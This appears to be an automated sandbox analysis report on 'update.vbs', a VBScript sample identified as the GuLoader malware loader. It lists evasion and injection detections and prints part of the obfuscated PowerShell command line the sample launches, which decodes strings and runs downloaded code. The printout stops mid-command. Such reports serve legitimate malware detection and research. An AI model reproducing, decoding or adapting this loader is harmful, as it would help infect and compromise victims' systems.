Windows
Analysis Report
update.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5008 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\updat e.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 1988 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$verdensf jerneconom atic = 1;$ Vastities= 'Su';$Vast ities+='bs trin';$Vas tities+='g ';Function Concolor( $Weaselly) {$Genoptag elserne=$W easelly.Le ngth-$verd ensfjernec onomatic;F or($verden sfjerne=5; $verdensfj erne -lt $ Genoptagel serne;$ver densfjerne +=6){$Teta nuses+=$We aselly.$Va stities.In voke( $ver densfjerne , $verdens fjernecono matic);}$T etanuses;} function r atlaasene( $Kontrasts ){& ($Pr otektioner ne) ($Kont rasts);}$Z emas=Conco lor 'Ka,ri MMisaloFor ,azRet.si ,ymplexpon lD.scoaFor ts/Rug,k5c irku.Hyp,t 0Stimu Run ds( annuWS avori Card nReguld re ecoHvi.ewA ntissPrea so,mNKd,o nTProdu no n,l1Autoe0 Kamer.I.ot r0Trans;re jse Inn.WP res.iB,ken n Trkn6Sti ft4Super; ef e Hi,lo xUdst 6Ryg el4Quidd;T ermo Pensr ProtevSial i: Semi1 O ver2Marsi1 Tmrer.Kont o0 aria),m sae jeerGS olodeKunst cfaberk fr akoHypos/ lowp2Tridk 0bogca1Vas ,e0Damas0 ervi1Finge 0Diphe1Sta ge K mplFM ann iSwash r G,ute,ud sjfCanceoF rustxsmin /Premi1Ber ed2Porce1 Xeno.voxe, 0Antip ';$ Egenartets =Concolor 'BathmU Mo rgsetuieeM arksrDepic -HaanlASag tmgAthaleS plitnFore, t Ther ';$ Bogbinderi =Concolor '.engehpol yttTangltO v rapBridg s Tact:Gru nd/Optog/S nkniw,rick wAftrywDev ot.SregnsP rsoeLnmo, n Sandd .y mmsD flopD ysuraDaarl cVandfeImi pr.Bottlc Af,eo N ma mAntid/ b. skpPokinr .nsooYvonn /Exs.fd ,n iflprste/M onop7 ight dVulcahAca ntiSkannd .mmu7Spawn ';$Prakri ti=Concolo r 'Fangs>N eigh ';$Pr otektioner ne=Concolo r 'damesiG r.fie homo xM,til ';$ Dournesses ='Forureni ngskildens ';ratlaase ne (Concol or 'NatioS Nyt ieSamm etpea.a-Be dl,CNont o Frognansk atLivreeAs sonn F.lkt Thic D ss e-DerriPEd ifiaOrgant Provih .je n Per.eTDi sse: Tykn\ BetonDSk.k kiOverimSt i,lyUrban. LakfatFi,k exvr,retBy grn Skave- grassVFejl faDiplol S an u B ege Josfl Bomb e$Lab.aDNo ncooWooleu GemarUdso .nEnerge A p.ssFlosss Preh,e Kom msApoko; , top ');rat laasene (C oncolor 'M out.i Damb fLor.e Wiv er(AdscitT rocte Fora s leoptAl al- LeiopP lastaOverf tRetarh To ur BugseTS ulai: tran \W,sseDApp leiShab,mT il.sySmnde .UnadutRli gsx Ekstt trep)Marke {WhiteeD.b stxPosthio plbetBes,a }.onre;Ove rs ');$Une nsouled = Concolor ' Tu,lieFrkn ec PalmhBl a,koLa el .erde% han taOraklpGo dtepFrancd Varmeamagg itUntemaBe dri%Beslu\ UnderAMuco scFlskeeRa tiot Ungry Kakol Der amOverteBo urotpa,eih SognyGris slTilbycKn l.daMe.vir Forh bF.ri niWal,inFo ruroMisi.l Rdstj. ,ur rRUsseloSk ndinRende D,mit& Oss a& flam Ly skoeVul,sc Gdninh Ace toEnerg sk r.p$Stade ';ratlaase ne (Concol or 'Gr nd$ Ind,g.dhu llVoda.oDe spob freda Pte,lHedg ,:W.llsPSp bra Reg,g Kab,aU,si dn DeciiHo logsY,lloh ,ende7Misc o3Apo.i=Ay a o(B.slac